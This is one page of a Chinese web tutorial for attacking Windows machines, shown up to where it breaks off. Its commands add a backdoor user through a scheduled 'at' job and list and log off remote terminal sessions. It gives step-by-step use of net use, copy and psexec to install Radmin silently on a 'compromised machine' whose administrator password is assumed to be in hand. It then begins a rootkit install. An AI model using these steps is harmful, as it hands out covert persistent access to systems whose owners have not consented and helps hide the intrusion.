|
|
|
|
|
|
|
|
|
命令”
at 9:01 “net user aspnet wshakcer /add ”
net time
说明该命令一般是配合net time命令使用
(14)查看远程终端连接情况:query user /quser
(15)注销远程终端用户:logoff 1/2/3
(16)命令模式安装radmin远程控制软件
前提:将radmin的三个服务端文件(admdll.dll,raddrv.dll,r_server.exe)放入一个文件夹,并且已经获得了被入侵机器的管理员密码。
net use \\ip\admin$ “密码” /u:administrator
copy *.* \\192.168.45.219\admin$\system32\
psexec \\192.168.45.219 -u user –p password cmd
然后执行命令:
netstat -an |find "4899"
net stop r_server
r_server.exe /pass:wshacker /port:4899 /save /silence
r_server.exe /install /silence
net start r_server
net start r_server
netstat -an |find "4899"
netstat -an |find "4899"
(17)安装rootkit
将ntboot.exe ntboot.dll拷入系统目录,然后执行ntboot –install命令,root 页码:[1] [2] [3] [4] [5] [6] [7] [8] [9] 第3页、共9页 |
|
|
|
|
设为首页 | 加入收藏 | 广告服务 | 友情链接 | 版权申明
Copyriht 2007 - 2008 © 科普之友 All right reserved |
